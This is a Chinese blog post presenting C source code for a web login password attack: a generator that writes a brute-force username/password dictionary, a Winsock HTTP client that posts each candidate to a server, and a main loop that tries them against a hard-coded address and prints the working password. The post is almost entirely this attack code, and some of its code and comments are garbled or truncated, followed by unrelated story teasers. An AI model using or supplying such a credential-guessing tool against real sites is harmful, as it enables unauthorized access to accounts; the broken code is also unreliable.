2019-11-11

基于網(wǎng)頁(yè)的口令攻擊的實(shí)現(xiàn)

?1、攻擊字典實(shí)現(xiàn)(簡(jiǎn)單實(shí)現(xiàn)米丘,在已知口令位數(shù)前提下,且限制字典庫(kù)口令數(shù)目):

#include

#include

#include

#define USERLEN 7

#define PASSLEN 9

#define SIZEOFTABLE 63

static char table[SIZEOFTABLE] = "1234567890QWERTYUIOPqwertyuiopasdfghjklASDFGHJKLmnbvcxzZXCVBNM";

int jinweiadd(int &count)

{

count++;

if(count==SIZEOFTABLE)

{

count = 0;

return 1;

}

return 0;

}

void addcount(int count[16])

{

for(int i = 0;i<16;i++)

{

if(jinweiadd(count[i]) == 0)

break;

}

}

//

void makeone_usps()

{

unsigned test=0;

char userpas[40]={0};

char *qian = "username=";

char *hou = "&password=";

int count[16] = {0};//做計(jì)數(shù)的數(shù)組

FILE *fp;

char *filename = "./字典.txt";

int j=0,t=0;

char user[8];

char pas[10];

int i = 0;

char huiche[2] = {'\r','\n'};

fp = fopen(filename,"wb");

while(1)

{

//chanshengbingchucun

for(j=0;j<7;j++)

{

user[j]=table[count[j]];

}

user[j] = 0;

for(j=8;j<17;j++)

{

pas[j-8]=table[count[j-1]];

}

pas[j-8] = 0;

for(t=0;t<9;t++)

{

userpas[t] = qian[t];

}

for(;t<16;t++)

{

userpas[t] = user[t-9];

}

for(;t<26;t++)

{

userpas[t] = hou[t-16];

}

for(;t<36;t++)

{

userpas[t] = pas[t-26];

}

fwrite(userpas,sizeof(char),35,fp);

fwrite(huiche,sizeof(char),2,fp);

if(count[15]==SIZEOFTABLE-1)

break;

?addcount(count);

?test++;

?if(test==0xfffffff)

?break;

}

fclose(fp);

}

void getone_usps(char usrpas[],unsigned long &count)//count是從零開(kāi)始的

{

unsigned long i=0;

char mid;

FILE *fp;

char *filename = "./字典.txt";

fp = fopen(filename,"rb");

while(i

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\n')

i++;

}

for(i=0;i<65;i++)

{

usrpas[i]=0;

}

for(i=0;i<65;i++)

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\r')

break;

usrpas[i]=mid;

}

fclose(fp);

count++;

}

2、HTTP協(xié)議實(shí)現(xiàn)客戶端:

#include

#include

#pragma comment(lib,"ws2_32.lib")

int compare(char buffer[])

{

unsigned int i=0x182;

for(;i<1024;i++)

{

if((buffer[i]=='r')&&(buffer[i+1]=='e')&&(buffer[i+2]=='d'))

break;

i++;

}

if(i==1024)

return 1;

i+=8;

unsigned int a=(unsigned int)buffer[i]&0xff;

unsigned int b=(unsigned int)buffer[i+1]&0xff;

if(a==0xb2)

if(b==0xbb)

return 0;

return 1;//代表匹配

}

int testonce(char *usrpas,char ServerIPAddr[],int ServerPort)

{

int flag = -1;

FILE *fp;//,*fp1,*fp2;

int i=0,j=0;

//WSAData 數(shù)據(jù)結(jié)構(gòu)

WSADATA wsaData;

//客戶端套接字句柄

SOCKET ClientSocket;

//服務(wù)器地址

SOCKADDR_IN ServerAddr;

//發(fā)送數(shù)據(jù)

char SendData[1024];

fp = fopen("./前奏.txt","rb");

while(!feof(fp))

{

fread(&SendData[i],sizeof(char),1,fp);

i++;

}

i--;

int midsize = strlen(usrpas);

for(j = 0;j

{

SendData[i] = usrpas[j];

i++;

}

SendData[i] = 0;

fclose(fp);

char ReceiveBuffer[1024] = "";

int SendLength = -1;

int Result = -1;

//初始化 Winsock

if((Result = WSAStartup(MAKEWORD(2,2),&wsaData))!=0)

{

printf("WSAStartup 失旛锿铩!錯(cuò)誤代碼:%d\n",Result);

return -1;

}

ClientSocket = socket(AF_INET,//協(xié)議族

SOCK_STREAM,//流套接字類型

IPPROTO_TCP);//TCP協(xié)議

if(ClientSocket<0)

{

printf("socket 失斎赂ā簿姨!錯(cuò)誤代碼:%d\n",WSAGetLastError());

return -1;

}

memset(&ServerAddr,0,sizeof(ServerAddr));

//填充SOCKADDR_IN

//用來(lái)表示服務(wù)器的IP和端口

//協(xié)議族類型為AF_INET

ServerAddr.sin_family = AF_INET;

//設(shè)置服務(wù)器端口號(hào)

ServerAddr.sin_port = htons(ServerPort);

//設(shè)置服務(wù)器的IP地址

ServerAddr.sin_addr.s_addr = inet_addr(ServerIPAddr);

//連接服務(wù)器

Result = connect(ClientSocket,//套接字句柄

(SOCKADDR*)&ServerAddr,//服務(wù)器地址

sizeof(ServerAddr));//地址結(jié)構(gòu)長(zhǎng)度

if(Result<0)

{

printf("連接失敗!錯(cuò)誤代碼:%d\n",WSAGetLastError());

return -1;

}

//發(fā)送數(shù)據(jù)

SendLength = send(ClientSocket,//套接字句柄

SendData,//發(fā)送數(shù)據(jù)緩沖區(qū)

strlen(SendData),//長(zhǎng)度

0);//標(biāo)志為0

if(SendLength<0)

{

printf("發(fā)送失敱馕弧准潭!錯(cuò)誤代碼:%d\n",WSAGetLastError());

return -1;

}

//else

//printf("發(fā)送數(shù)據(jù)為:%s\n",SendData);

int ReceiveLen;

//清零

memset(ReceiveBuffer,0,sizeof(ReceiveBuffer));

//接收數(shù)據(jù)

if((ReceiveLen = recv(ClientSocket,ReceiveBuffer,1024,0))<0)

{

printf("接收失敗域仇!錯(cuò)誤代碼:%d\n",WSAGetLastError());

return -1;

}

else

{

//printf("接收數(shù)據(jù)為:%s\n",ReceiveBuffer);

if(compare(ReceiveBuffer)==1)

flag=1;

}

if(closesocket(ClientSocket)==SOCKET_ERROR)

{

printf("關(guān)閉socket失敗錯(cuò)誤代碼是%d\n",WSAGetLastError());

}

//釋放Winsock

if(WSACleanup() == SOCKET_ERROR)

{

printf("釋放Winsock失敗錯(cuò)誤代碼是%d\n",WSAGetLastError());

}

return flag;

}

3刑然、三次握手驗(yàn)證口令:

#include "Httptest.h"

#include "dic.h"

#include

int semfile1 = 0;

int semfile2 = 0;

unsigned long count=0;

int threadnum=0;

int numcount=0;

int success = 0;

char result[90];

int threadend=0;

DWORD WINAPI thread(LPVOID ptheread)

{

while(success ==0)

{

system("cls");

if(success !=0)

break;

printf("wait.");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait..");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait...");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait....");

_sleep(250);

}

system("cls");

return 1;

}

void main()

{

char usrpas[65]="";

char ServerIPAddr[50] = "10.0.0.25";

int ServerPort = 80;

unsigned long numofdic=13;

DWORD threadid;

CreateThread(0,0,thread,0,0,&threadid);

while(count

{

getone_usps(usrpas,count);

int flag = testonce(usrpas,ServerIPAddr,ServerPort);

if(flag==1)

{

success = 1;

//printf("成功密碼為%s\n",usrpas);

break;

}

}

if(count == numofdic)

success = 2;

_sleep(500);

if(success == 1)

printf("成功密碼為%s\n",usrpas);

else

printf("字典庫(kù)中無(wú)合適的用戶名密碼\n");

return;

}

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市暇务,隨后出現(xiàn)的幾起案子泼掠,更是在濱河造成了極大的恐慌,老刑警劉巖垦细,帶你破解...
    沈念sama閱讀 211,290評(píng)論 6 491
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件择镇,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡括改,警方通過(guò)查閱死者的電腦和手機(jī)腻豌,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,107評(píng)論 2 385
  • 文/潘曉璐 我一進(jìn)店門(mén),熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)叹谁,“玉大人饲梭,你說(shuō)我怎么就攤上這事⊙骈荩” “怎么了憔涉?”我有些...
    開(kāi)封第一講書(shū)人閱讀 156,872評(píng)論 0 347
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)析苫。 經(jīng)常有香客問(wèn)我兜叨,道長(zhǎng),這世上最難降的妖魔是什么衩侥? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,415評(píng)論 1 283
  • 正文 為了忘掉前任国旷,我火速辦了婚禮,結(jié)果婚禮上茫死,老公的妹妹穿的比我還像新娘跪但。我一直安慰自己,他們只是感情好峦萎,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,453評(píng)論 6 385
  • 文/花漫 我一把揭開(kāi)白布屡久。 她就那樣靜靜地躺著,像睡著了一般爱榔。 火紅的嫁衣襯著肌膚如雪被环。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 49,784評(píng)論 1 290
  • 那天详幽,我揣著相機(jī)與錄音筛欢,去河邊找鬼浸锨。 笑死,一個(gè)胖子當(dāng)著我的面吹牛版姑,可吹牛的內(nèi)容都是我干的柱搜。 我是一名探鬼主播,決...
    沈念sama閱讀 38,927評(píng)論 3 406
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼剥险,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼冯凹!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起炒嘲,我...
    開(kāi)封第一講書(shū)人閱讀 37,691評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎匈庭,沒(méi)想到半個(gè)月后夫凸,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,137評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡阱持,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,472評(píng)論 2 326
  • 正文 我和宋清朗相戀三年夭拌,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片衷咽。...
    茶點(diǎn)故事閱讀 38,622評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡鸽扁,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出镶骗,到底是詐尸還是另有隱情桶现,我是刑警寧澤,帶...
    沈念sama閱讀 34,289評(píng)論 4 329
  • 正文 年R本政府宣布鼎姊,位于F島的核電站骡和,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏相寇。R本人自食惡果不足惜慰于,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,887評(píng)論 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望唤衫。 院中可真熱鬧婆赠,春花似錦、人聲如沸佳励。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,741評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)植兰。三九已至份帐,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間楣导,已是汗流浹背废境。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,977評(píng)論 1 265
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人噩凹。 一個(gè)月前我還...
    沈念sama閱讀 46,316評(píng)論 2 360
  • 正文 我出身青樓巴元,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親驮宴。 傳聞我的和親對(duì)象是個(gè)殘疾皇子逮刨,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,490評(píng)論 2 348

推薦閱讀更多精彩內(nèi)容